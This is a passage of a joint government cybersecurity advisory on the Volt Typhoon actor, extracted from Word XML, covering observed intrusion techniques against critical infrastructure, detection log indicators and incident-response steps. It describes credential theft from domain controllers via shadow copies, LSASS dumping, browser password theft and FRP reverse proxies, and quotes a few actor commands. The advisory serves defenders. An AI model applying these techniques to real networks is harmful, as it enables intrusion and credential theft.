        <w:t>Volt Typhoon conducts discovery in the victim's network, leveraging LOTL binaries for stealth. A key tactic includes using PowerShell to perform targeted queries on Windows event logs, focusing on specific users and periods. These queries facilitate the discreet extraction of security event logs into .dat files, allowing Volt Typhoon actors to gather critical information while minimizing detection. This strategy, blending in-depth pre-compromise reconnaissance with meticulous post-exploitation intelligence collection, underscores their sophisticated and strategic approach to cyber operations.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Volt Typhoon achieves full domain compromise by extracting the Active Directory database (NTDS.dit) from the DC. Volt Typhoon frequently employs the Volume Shadow Copy Service (VSS) using command-line utilities such as vssadmin to access NTDS.dit. The NTDS.dit file is a centralized repository that contains critical Active Directory data, including user accounts, passwords (in hashed form), and other sensitive data, which can be leveraged for further exploitation. This method entails the creation of a shadow copy-a point-in-time snapshot-of the volume hosting the NTDS.dit file. By leveraging this snapshot, Volt Typhoon actors effectively bypass the file locking mechanisms inherent in a live Windows environment, which typically prevent direct access to the NTDS.dit file while the domain controller is operational.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Volt Typhoon likely uses offline password cracking techniques to decipher these hashes. This process involves extracting the hashes from the NTDS.dit file and then applying various password cracking methods, such as brute force attacks, dictionary attacks, or more sophisticated techniques like rainbow tables to uncover the plaintext passwords. The successful decryption of these passwords allows Volt Typhoon actors to obtain elevated access and further infiltrate and manipulate the network.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Volt Typhoon uses elevated credentials for strategic network infiltration and additional discovery, often focusing on gaining capabilities to access OT assets. Volt Typhoon actors have been observed testing access to domain- joint OT assets using default OT vendor credentials, and in certain instances, they have possessed the capability to access OT systems whose credentials were compromised via NTDS.dit theft. This access enables potential disruptions, such as manipulating heating, ventilation, and air conditioning (HVAC) systems in server rooms or disrupting critical energy and water controls, leading to significant infrastructure failures (in some cases, Volt Typhoon actors had the capability to access camera surveillance systems at critical infrastructure facilities). In one confirmed compromise, Volt Typhoon actors moved laterally to a control system and were positioned to move to a second control system.</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 Typical Volt Typhoon Activity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successfully gaining access to legitimate accounts, Volt Typhoon actors exhibit minimal activity within the compromised environment (except discovery as noted above), suggesting their objective is to maintain persistence rather than immediate exploitation. This assessment is supported by observed patterns where Volt Typhoon methodically re-targets the same organizations over extended periods, often spanning several years, to continuously validate and potentially enhance their unauthorized accesses. Evidence of their meticulous approach is seen in instances where they repeatedly exfiltrate domain credentials, ensuring access to current and valid accounts. For example, in one compromise, Volt Typhoon likely extracted NTDS.dit from three domain controllers in a four-year period. In another compromise, Volt Typhoon actors extracted NTDS.dit two times from a victim in a nine-month period.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Industry reporting-identifying that Volt Typhoon actors are silent on the network following credential dumping and perform discovery to learn about the environment, but do not exfiltrate data-is consistent with the U.S. authoring </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>agencies' observations. This indicates their aim is to achieve and maintain persistence on the network. In one confirmed compromise, an industry partner observed Volt Typhoon actors dumping credentials at regular intervals.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addition to leveraging stolen account credentials, the actors use LOTL techniques and avoid leaving malware artifacts on systems that would cause alerts. Their strong focus on stealth and operational security allows them to maintain long-term, undiscovered persistence. Further, Volt Typhoon's operational security is enhanced by targeted log deletion to conceal their actions within the compromised environment.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See the below sections for Volt Typhoon TTPs observed by the U.S. authoring agencies from multiple confirmed Volt Typhoon compromises. Observed TTPs Reconnaissance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 actors conduct extensive pre-compromise reconnaissance [TA0043] to learn about the target organization [T1591], its network [T1590], and its staff [T1589]. This includes web searches [T1593]- including victim-owned sites [T1594]-for victim host [T1592], identity, and network information, especially for information on key network and IT administrators. According to industry reporting, Volt Typhoon actors use FOFA[1], Shodan, and Censys for querying or searching for exposed infrastructure. In some instances, the U.S. authoring agencies have observed Volt Typhoon actors targeting the personal emails of key network and IT staff [T1589.002] post compromise. Resource Development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Historically, Volt Typhoon actors use multi-hop proxies for command and control (C2) infrastructure [T1090.003]. The proxy is typically composed of virtual private servers (VPSs) [T1583.003] or small office/home office (SOHO) routers. Recently, Volt Typhoon actors used Cisco and NETGEAR end-of- life SOHO routers implanted with KV Botnet malware to support their operations [T1584.005]. (See DOJ press release U.S. Government Disrupts Botnet People's Republic of China Used to Conceal Hacking of Critical Infrastructure for more information). Initial Access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 obtain initial access [TA0001], Volt Typhoon actors commonly exploit vulnerabilities in networking appliances such as those from Fortinet, Ivanti Connect Secure (formerly Pulse Secure), NETGEAR, Citrix, and Cisco [T1190]. They often use publicly available exploit code for known vulnerabilities [T1588.005] but are also adept at discovering and exploiting zero-day vulnerabilities [T1587.004].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>In one confirmed compromise, Volt Typhoon actors likely obtained initial access by exploiting CVE-2022-42475 in a network perimeter FortiGate 300D firewall that was not patched. There is evidence of a buffer overflow attack identified within the Secure Sockets Layer (SSL)-VPN crash logs.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Once initial access is achieved, Volt Typhoon actors typically shift to establishing persistent access [TA0003]. They often use VPN sessions to securely connect to victim environments [T1133], enabling discreet follow- on intrusion activities. This tactic not only provides a stable foothold in the network but also allows them to blend in with regular traffic, significantly reducing their chances of detection. Execution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 actors rarely use malware for post-compromise execution. Instead, once Volt Typhoon actors gain access to target environments, they use hands-on-keyboard activity via the command-line [T1059] and other native tools and processes on systems [T1218] (often referred to as "LOLBins"), known as LOTL, to maintain and expand access to the victim networks. According to industry reporting, some "commands appear to be exploratory or experimental, as the operators [i.e., malicious actors] adjust and repeat them multiple times."[2]</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more details on LOTL activity, see the Credential Access and Discovery sections and Appendix A: Volt Typhoon LOTL Activity.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Similar to LOTL, Volt Typhoon actors also use legitimate but outdated versions of network admin tools. For example, in one confirmed compromise, actors downloaded [T1105] an outdated version of comsvcs.dll on the DC in a non-standard folder. comsvcs.dll is a legitimate Microsoft Dynamic Link Library (DLL) file normally found in the System32 folder. The actors used this DLL with MiniDump and the process ID of the Local Security Authority Subsystem Service (LSASS) to dump the LSASS process memory [T1003.001] and obtain credentials (LSASS process memory space contains hashes for the current user's operating system (OS) credentials).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actors also use legitimate non-native network admin and forensic tools. For example, Volt Typhoon actors have been observed using Magnet RAM Capture (MRC) version 1.20 on domain controllers. MRC is a free imaging tool that captures the physical memory of a computer, and Volt Typhoon actors likely used it to analyze in-memory data for sensitive information (such as credentials) and in-transit data not typically accessible on disk. Volt Typhoon actors have also been observed implanting Fast Reverse Proxy (FRP) for command and control.[3] (See the Command and Control section). Persistence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 primarily relies on valid credentials for persistence [T1078]. Defense Evasion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 has strong operational security. Their actors primarily use LOTL for defense evasion [TA0005], which allows them to camouflage their malicious activity with typical system and network behavior, potentially circumventing simplistic endpoint security capabilities. For more information, see joint guide Identifying and Mitigating Living off the Land Techniques.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Volt Typhoon actors also obfuscate their malware. In one confirmed compromise, Volt Typhoon obfuscated FRP client files (BrightmetricAgent.exe and SMSvcService.exe) and the command-line port scanning utility ScanLine by packing the files with Ultimate Packer for Executables (UPX) [T1027.002]. FRP client applications support encryption, compression, and easy token authentication and work across multiple protocols-including transmission control protocol (TCP), user datagram protocol (UDP), hypertext transfer protocol (HTTP), and hypertext transfer protocol secure (HTTPS). The FRP client applications use the Kuai connection protocol (KCP) for error-checked and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>anonymous data stream delivery over UDP, with packet- level encryption support. See Appendix C and CISA Malware Analysis Report (MAR)-10448362-1.v1 for more information.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addition to LOTL and obfuscation techniques, Volt Typhoon actors have been observed selectively clearing Windows Event Logs [T1070.001], system logs, and other technical artifacts to remove evidence [T1070.009] of their intrusion activity and masquerading file names [T1036.005]. Credential Access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 actors first obtain credentials from public-facing appliances after gaining initial access by exploiting privilege escalation vulnerabilities [T1068] in the operating system or network services. In some cases, they have obtained credentials insecurely stored on the appliance [T1552]. In one instance, where Volt Typhoon likely exploited CVE- 2022-42475 in an unpatched Fortinet device, Volt Typhoon actors compromised a domain admin account stored inappropriately on the device.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 also consistently obtains valid credentials by extracting the Active Directory database file (NTDS.dit)-in some cases multiple times from the same victim over long periods [T1003.003]. NTDS.dit contains usernames, hashed passwords, and group memberships for all domain accounts, essentially allowing for full domain compromise if the hashes can be cracked offline.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 obtain NTDS.dit, the U.S. authoring agencies have observed Volt Typhoon: Move laterally [TA0008] to the domain controller via an interactive RDP session using a compromised account with domain administrator privileges [T1021.001]; Execute the Windows-native vssadmin [T1006] command to create a volume shadow copy; Use Windows Management Instrumentation Console (WMIC) commands [T1047] to execute ntdsutil (a LOTL utility) to copy NTDS.dit and SYSTEM registry hive from the volume shadow copy; and Exfiltrate [TA0010] NTDS.dit and SYSTEM registry hive to crack passwords offline) [T1110.002]. (For more details, including specific commands used, see Appendix A: Volt Typhoon LOTL Activity.) Note: A volume shadow copy contains a copy of all the files and folders that exist on the specified volume. Each volume shadow copy created on a DC includes its NTDS.dit and the SYSTEM registry hive, which provides keys to decrypt the NTDS.dit file.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 actors have also been observed interacting with a PuTTY application by enumerating existing stored sessions [T1012]. Given this interaction and the exposure of cleartext-stored proxy passwords used in remote administration, Volt Typhoon actors potentially had access to PuTTY profiles that allow access to critical systems (see the Lateral Movement section).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industry reporting, Volt Typhoon actors attempted to dump credentials through LSASS (see Appendix B for commands used).[2]</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authoring agencies have observed Volt Typhoon actors leveraging Mimikatz to harvest credentials, and industry partners have observed Volt Typhoon leveraging Impacket.[2] Mimikatz is a credential dumping tool and Volt Typhoon actors use it to obtain credentials. In one confirmed compromise, the Volt Typhoon used RDP to connect to a server and run Mimikatz after leveraging a compromised administrator account to deploy it.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Impacket is an open source Python toolkit for programmatically constructing and manipulating network protocols. It contains tools for Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks-as well as remote service execution. Discovery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 actors have been observed using commercial tools, LOTL utilities, and appliances already present on the system for system information [T1082], network service [T1046], group [T1069] and user [T1033] discovery.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 uses at least the following LOTL tools and commands for system information, network service, group, and user discovery techniques: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cmd certutil dnscmd ldifde makecab net user/group/use netsh nltest netstat ntdsutil ping PowerShell quser reg query/reg save systeminfo tasklist wevtutil whoami wmic xcopy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observed specific examples of discovery include: Capturing successful logon events [T1654].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Specifically, in one incident, analysis of the PowerShell console history of a domain controller indicated that security event logs were directed to a file named user.dat, as evidenced by the executed command Get-EventLog security -instanceid 4624 -after [year-month-date] | fl * | Out-File 'C:\users\public\documents\user.dat'. This indicates the group's specific interest in capturing successful logon events (event ID 4624) to analyze user authentication patterns within the network. Additionally, file system analysis, specifically of the Master File Table (MFT), uncovered evidence of a separate file, systeminfo.dat, which was created in C:\Users\Public\Documents but subsequently deleted [T1070.004]. The presence of these activities suggests a methodical approach by Volt Typhoon actors in collecting and then possibly removing traces of sensitive log information from the compromised system.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Executing tasklist /v to gather a detailed process listing [T1057], followed by executing taskkill /f /im rdpservice.exe (the function of this executable is not known).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Executing net user and quser for user account information [T1087.001]. Creating and accessing a file named rult3uil.log on a domain controller in C:\Windows\System32\. The rult3uil.log file contained user activities on a compromised system, showcasing a combination of window title information [T1010] and focus shifts, keypresses, and command executions across Google Chrome and Windows PowerShell, with corresponding timestamps.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Employing ping with various IP addresses to check network connectivity [T1016.001] and net start to list running services [T1007].</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See Appendix A for additional LOTL examples.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one confirmed compromise, Volt Typhoon actors attempted to use Advanced IP Scanner, which was on the network for admin use, to scan the network.</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Volt Typhoon actors have been observed strategically targeting network administrator web browser data-focusing on both browsing history and stored credentials [T1555.003]-to facilitate targeting of personal email addresses (see the Reconnaissance section) for further discovery and possible network modifications that may impact the threat actor's persistence within victim networks.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one confirmed compromise: Volt Typhoon actors obtained the history file from the User Data directory of a network administrator user's Chrome browser. To obtain the history file, Volt Typhoon actors first executed an RDP session to the user's workstation where they initially attempted, and failed, to obtain the C$ File Name: users\{redacted}\appdata\local\Google\Chrome\UserData\default\History file, as evidenced by the accompanying 1016 (reopen failed) SMB error listed in the application event log. The threat actors then disconnected the RDP session to the workstation and accessed the file C:\Users\{redacted}\Downloads\History.zip. This file presumably contained data from the User Data directory of the user's Chrome browser, which the actors likely saved in the Downloads directory for exfiltration [T1074]. Shortly after accessing the history.zip file, the actors terminated RDP sessions.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>About four months later, Volt Typhoon actors accessed the same user's Chrome data C$ File Name: Users\{redacted}\AppData\Local\Google\Chrome\User Data\Local State and $ File Name: Users\{redacted}\AppData\Local\Google\Chrome\User Data\Default\Login Data via SMB. The Local State file contains the Advanced Encryption Standard (AES) encryption key [T1552.004] used to encrypt the passwords stored in the Chrome browser, which would enable the actors to obtain plaintext passwords stored in the Login Data file in the Chrome browser.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another confirmed compromise, Volt Typhoon actors accessed directories containing Chrome and Edge user data on multiple systems. Directory interaction was observed over the network to paths such as C:\Users\{redacted}\AppData\Local\Google\Chrome\User Data\ and C:\Users\{redacted}\AppData\Local\Microsoft\Edge\User Data\. They also enumerated several directories, including directories containing vulnerability testing and cyber related content and facilities data, such as construction drawings [T1083]. Lateral Movement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lateral movement, Volt Typhoon actors have been observed predominantly employing RDP with compromised valid administrator credentials. Note: With a full on-premises Microsoft Active Directory identity compromise (see the Credential Access section), the group may be capable of using other methods such as Pass the Hash or Pass the Ticket for lateral movement [T1550].</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one confirmed compromise of a Water and Wastewater Systems Sector entity, after obtaining initial access, Volt Typhoon actors connected to the network via a VPN with administrator credentials they obtained and opened an RDP session with the same credentials to move laterally. Over a nine-month period, they moved laterally to a file server, a domain controller, an Oracle Management Server (OMS), and a VMware vCenter server. The actors obtained domain credentials from the domain controller and performed discovery, collection, and exfiltration on the file server (see the Discovery and Collection and Exfiltration sections).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Typhoon's movement to the vCenter server was likely strategic for pre- positioning to OT assets. The vCenter server was adjacent to OT assets, and Volt Typhoon actors were observed interacting with the PuTTY application on the server by enumerating existing stored sessions. With this information, Volt Typhoon potentially had access to a range of critical PuTTY profiles, including those for water treatment plants, water wells, an electrical substation, OT systems, and network security devices. This would enable them to access these critical systems [T1563]. See Figure 2.</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2: Volt Typhoon Lateral Movement Path File Server, DC, and OT- Adjacent Assets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Additionally, Volt Typhoon actors have been observed using PSExec to execute remote processes, including the automated acceptance of the end- user license agreement (EULA) through an administrative account, signified by the accepteula command flag.</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 actors may have attempted to move laterally to a cloud environment in one victim's network but direct attribution to the Volt Typhoon group was inconclusive. During the period of the their known network presence, there were anomalous login attempts to an Azure tenant [T1021.007] potentially using credentials [T1078.004] previously compromised from theft of NTDS.dit. These attempts, coupled with misconfigured virtual machines with open RDP ports, suggested a potential for cloud-based lateral movement. However, subsequent investigations, including password changes and multifactor authentication (MFA) implementations, revealed authentication failures from non-associated IP addresses, with no definitive link to Volt Typhoon. Collection and Exfiltration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authoring agencies assess Volt Typhoon primarily collects information that would facilitate follow-on actions with physical impacts. For example, in one confirmed compromise, they collected [TA0009] sensitive information obtained from a file server in multiple zipped files [T1560] and likely exfiltrated [TA0010] the files via Server Message Block (SMB) [T1048] (see Figure 3). Collected information included diagrams and documentation related to OT equipment, including supervisory control and data acquisition (SCADA) systems, relays, and switchgear. This data is crucial for understanding and potentially impacting critical infrastructure systems, indicating a focus on gathering intelligence that could be leveraged in actions targeting physical assets and systems.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3: Volt Typhoon Attack Path for Exfiltration of Data from File Server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In another compromise, Volt Typhoon actors leveraged WMIC to create and use temporary directories (C:\Users\Public\pro, C:\Windows\Temp\tmp, C:\Windows\Temp\tmp\Active Directory and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>C:\Windows\Temp\tmp\registry) to stage the extracted ntds.dit and SYSTEM registry hives from ntdsutil execution volume shadow copies (see the Credential Access section) obtained from two DCs. They then compressed and archived the extracted ntds.dit and accompanying registry files by executing ronf.exe, which was likely a renamed version of the archive utility rar.exe) [T1560.001]. Command and Control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 actors have been observed leveraging compromised SOHO routers and virtual private servers (VPS) to proxy C2 traffic. For more information, see DOJ press release U.S. Government Disrupts Botnet People's Republic of China Used to Conceal Hacking of Critical Infrastructure).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have also been observed setting up FRP clients [T1090] on a victim's corporate infrastructure to establish covert communications channels [T1573] for command and control. In one instance, Volt Typhoon actors implanted the FRP client with filename SMSvcService.exe on a Shortel Enterprise Contact Center (ECC) server and a second FRP client with filename Brightmetricagent.exe on another server. These clients, when executed via PowerShell [T1059.001], open reverse proxies between the compromised system and Volt Typhoon C2 servers. Brightmetricagent.exe has additional capabilities. The FRP client can locate servers behind a network firewall or obscured through Network Address Translation (NAT) [T1016]. It also contains multiplexer libraries that can bi-directionally stream data over NAT networks and contains a command-line interface (CLI) library that can leverage command shells such as PowerShell, Windows Management Instrumentation (WMI), and Z Shell (zsh) [T1059.004]. See Appendix C and MAR-10448362-1.v1 for more information.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same compromise, Volt Typhoon actors exploited a Paessler Router Traffic Grapher (PRTG) server as an intermediary for their FRP operations. To facilitate this, they used the netsh command, a legitimate Windows command, to create a PortProxy registry modification [T1112] on the PRTG server [T1090.001]. This key alteration redirected specific port traffic to Volt Typhoon's proxy infrastructure, effectively converting the PRTG's server into a proxy for their C2 traffic [T1584.004] (see Appendix B for details). DETECTION/HUNT RECOMMENDATIONS Apply Living off the Land Detection Best Practices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Apply the prioritized detection and hardening best practice recommendations provided in joint guide Identifying and Mitigating Living off the Land Techniques. Many organizations lack security and network management best practices (such as established baselines) that support detection of malicious LOTL activity-this makes it difficult for network defenders to discern legitimate behavior from malicious behavior and conduct behavior analytics, anomaly detection, and proactive hunting. Conventional IOCs associated with the malicious activity are generally lacking, complicating network defenders' efforts to identify, track, and categorize this sort of malicious behavior. This advisory provides guidance for a multifaceted cybersecurity strategy that enables behavior analytics, anomaly detection, and proactive hunting, which are part of a comprehensive approach to mitigating cyber threats that employ LOTL techniques.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Review Application, Security, and System Event Logs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Routinely review application, security, and system event logs, focusing on Windows Extensible Storage Engine Technology (ESENT) Application Logs. Due to Volt Typhoon's ability for long-term undetected persistence, network defenders should assume significant dwell time and review specific application event log IDs, which remain on endpoints for longer periods compared to security event logs and other ephemeral artifacts. Focus on Windows ESENT logs because certain ESENT Application Log event IDs (216, 325, 326, and 327) may indicate actors copying NTDS.dit.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See Table 1 for examples of ESENT and other key log indicators that should be investigated. Please note that incidents may not always have exact matches listed in the Event Detail column due to variations in event logging and TTPs. Table 1: Key Log Indicators for Detecting Volt Typhoon Activity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Event ID (Log)</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Event Detail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Description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216 (Windows ESENT Application Log)</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database location change was detected from 'C:\Windows\NTDS\ntds.dit' to '\\?\GLOBALROOT\Device\{redacted}VolumeShadowCopy1\Windows\NTDS\ntds.dit'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change in the NTDS.dit database location is detected. This could suggest an initial step in NTDS credential dumping where the database is being prepared for extraction.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325 (Windows ESENT Application Log)</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database engine created a new database (2, C:\Windows\Temp\tmp\Active Directory\ntds.dit).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Indicates creation of a new NTDS.dit file in a non-standard directory. Often a sign of data staging for exfiltration. Monitor for unusual database operations in temp directories.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637 (Windows ESENT Application Log)</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C:\Windows\Temp\tmp\Active Directory\ntds.jfm-++- (0) New flush map file "C:\Windows\Temp\tmp\Active Directory\ntds.jfm" will be created to enable persisted lost flush detection.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 new flush map file is being created for NTDS.dit. This may suggest ongoing operations related to NTDS credential dumping, potentially capturing uncommitted changes to the NTDS.dit file.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326 (Windows ESENT Application Log)</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NTDS-++-12460,D,100-++--++-1-++-</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C:\$SNAP_{redacted}_VOLUMEC$\Windows\NTDS\ntds.dit-++-0-++- [1] The database engine attached a database. Began mounting of C:\Windows\NTDS\ntds.dit file created from volume shadow copy process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Represents the mounting of an NTDS.dit file from a volume shadow copy. This is a critical step in NTDS credential dumping, indicating active manipulation of a domain controller's data.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327 (Windows ESENT Application Log)</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C:\Windows\Temp\tmp\Active Directory\ntds.dit-++-1-++- [1] The database engine detached a database (2, C:\Windows\Temp\tmp\Active Directory\ntds.dit). Completion of mounting of ntds.dit file to C:\Windows\Temp\tmp\Active Director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detachment of a database, particularly in a temp directory, could indicate the completion of a credential dumping process, potentially as part of exfiltration preparations.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21 (Windows Terminal Services Local Session Manager Operational Log)</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Remote Desktop Services: Session logon succeeded: User: {redacted}\{redacted} Session ID: {redacted} Source Network Address: {redacted}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Successful authentication to a Remote Desktop Services session.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22 (Windows Terminal Services Local Session Manager Operational Log)</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Remote Desktop Services: Shell start notification received: User: {redacted}\{redacted} Session ID: {redacted} Source Network Address: {redacted}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Successful start of a new Remote Desktop session. This may imply lateral movement or unauthorized remote access, especially if the user or session is unexpected.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23 (Windows Terminal Services Local Session Manager Operational Log)</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Remote Desktop Services: Session logoff succeeded: User: {redacted}\{redacted} Session ID: {redacted}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Successful logoff of Remote Desktop session.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24 (Windows Terminal Services Local Session Manager Operational Log)</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Remote Desktop Services: Session has been disconnected: User: {redacted}\{redacted} Session ID: {redacted} Source Network Address: {redacted}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Remote Desktop session disconnected by user or due to network connectivity issues.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25 (Windows Terminal Services Local Session Manager Operational Log)</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Remote Desktop Services: Session reconnection succeeded: User: {redacted}\{redacted} Session ID: {redacted} Source Network Address: {redacted}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Successful reconnection to a Remote Desktop Services session. This may imply lateral movement or unauthorized remote access, especially if the user or session is unexpected.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1017 (Windows System Log)</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Handle scavenged.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 Name: C$</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File Name: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users\{redacted}\downloads\History.zip Durable: 1 Resilient or Persistent: 0 Guidance: The server closed a handle that was previously reserved for a client after 60 seconds.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Indicates the server closed a handle for a client. While common in network operations, unusual patterns or locations (like History.zip in a user's downloads) may suggest data collection from a local system.</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1102 (Windows Security Log)</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All Event ID 1102 entries should be investigated as logs are generally not cleared and this is a known Volt Typhoon tactic to cover their tracks. Monitor and Review OT System Logs Review access logs for communication paths between IT and OT networks, looking for anomalous accesses or protocols.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Measure the baseline of normal operations and network traffic for the industrial control system (ICS) and assess traffic anomalies for malicious activity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Configure intrusion detection systems (IDS) to create alarms for any ICS network traffic outside normal operations.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Track and monitor audit trails on critical areas of ICS.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Set up security incident and event monitoring (SIEM) to monitor, analyze, and correlate event logs from across the ICS network to identify intrusion attempts.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Review CISA's Recommended Cybersecurity Practices for Industrial Control Systems and the joint advisory, NSA and CISA Recommend Immediate Actions to Reduce Exposure Across all Operational Technologies and Control Systems, for further OT system detection and mitigation guidance. Use gait to Detect Possible Network Proxy Activities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Use gait[4] to detect network proxy activities. Developed by Sandia National Labs, gait is a publicly available Zeek[5] extension. The gait extension can help enrich Zeek's network connection monitoring and SSL logs by including additional metadata in the logs. Specifically, gait captures unique TCP options and timing data such as a TCP, transport layer security (TLS), and Secure Shell (SSH) layer inferred round trip times (RTT), aiding in the identification of the software used by both endpoints and intermediaries.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While the gait extension for Zeek is an effective tool for enriching network monitoring logs with detailed metadata, it is not specifically designed to detect Volt Typhoon actor activities. The extension's capabilities extend to general anomaly detection in network traffic, including-but not limited to-proxying activities. Therefore, while gait can be helpful in identifying tactics similar to those used by Volt Typhoon, such as proxy networks and FRP clients for C2 communication, not all proxying activities detected by using this additional metadata are necessarily indicative of Volt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Typhoon presence. It serves as a valuable augmentation to current security stacks for a broader spectrum of threat detection.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more information, see Sandia National Lab's gait GitHub page sandialabs/gait: Zeek Extension to Collect Metadata for Profiling of Endpoints and Proxies. Review Logins for Impossible Travel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Examine VPN or other account logon times, frequency, duration, and locations. Logons from two geographically distant locations within a short timeframe from a single user may indicate an account is being used maliciously. Logons of unusual frequency or duration may indicate a threat actor attempting to access a system repeatedly or maintain prolonged sessions for the purpose of data extraction. Review Standard Directories for Unusual Files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Review directories, such as C:\windows\temp\ and C:\users\public\, for unexpected or unusual files. Monitor these temporary file storage directories for files typically located in standard system paths, such as the System32 directory. For example, Volt Typhoon has been observed downloading comsvcs.dll to a non-standard folder (this file is normally found in the System32 folder). INCIDENT RESPONSE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If compromise, or potential compromise, is detected, organizations should assume full domain compromise because of Volt Typhoon's known behavioral pattern of extracting the NTDS.dit from the DCs. Organizations should immediately implement the following immediate, defensive countermeasures: Sever the enterprise network from the internet. Note: this step requires the agency to understand its internal and external connections. When making the decision to sever internet access, knowledge of connections must be combined with care to avoid disrupting critical functions.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>If you cannot sever from the internet, shutdown all non-essential traffic between the affected enterprise network and the internet.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Reset credentials of privileged and non-privileged accounts within the trust boundary of each compromised account.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
